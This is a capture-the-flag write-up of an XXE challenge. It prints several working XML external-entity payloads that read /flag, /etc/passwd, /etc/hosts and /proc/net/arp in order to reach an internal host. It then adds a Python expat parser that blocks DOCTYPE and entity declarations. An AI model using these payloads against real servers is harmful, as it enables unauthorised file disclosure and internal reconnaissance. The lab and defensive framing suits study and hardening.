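Last time I wrote up the "fake" one.
This time it is the "true" one.
Open the environment.
It is clearly XXE.
Capture the request directly.
The reflected output position is still 1.
Try reading the flag directly.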
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///flag">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
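An error, as expected; it is not that simple.
/etc/hosts: stored hostname-to-IP resolution entries
/etc/passwd: user account and password file
/proc/net/arp: the ARP table, with the device (dev) of each network interface entry
First look at /etc/passwd.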
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/passwd">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
Nothing useful found.
Next look at /etc/hosts.
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/hosts">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
No internal host IP there either.
Then try /proc/net/arp.
<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///proc/net/arp">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>
Found an internal host IP.
Got the flag.
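From the defender's side, every request above depends on the server accepting a DOCTYPE with an ENTITY declaration. The following is an added example, not code from the challenge or from this write-up: a login-body parser built on Python's standard expat binding that rejects any DTD before an entity can be declared. The names parse_login and ForbiddenXML are made up for the example, and the element layout is taken from the requests shown above.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or entity declaration."""


def parse_login(body: bytes) -> dict:
    """Parse <user><username/><password/></user>, refusing any DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()
    fields, path, text = {}, [], []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Fires when the DOCTYPE opens, before <!ENTITY ... SYSTEM "file://..."> is read.
        raise ForbiddenXML(f"DOCTYPE {name!r} not allowed")

    def forbid_entity(name, is_param, value, base, system_id, public_id, notation):
        raise ForbiddenXML(f"entity {name!r} not allowed")

    def start(tag, attrs):
        path.append(tag)
        text.clear()

    def end(tag):
        if path == ["user", tag] and tag in ("username", "password"):
            fields[tag] = "".join(text)
        path.pop()

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields


# Constructed samples: the /etc/passwd request from the write-up and a plain login.
XXE_BODY = b"""<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY M1kael SYSTEM "file:///etc/passwd">
]>
<user>
<username>&M1kael;</username>
<password>123456</password>
</user>"""
OK_BODY = b"<user><username>admin</username><password>123456</password></user>"
```

A rejected body raises ForbiddenXML before any element is processed, so the caller can return a generic 400 without reflecting parser output.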
Hope this article helps you!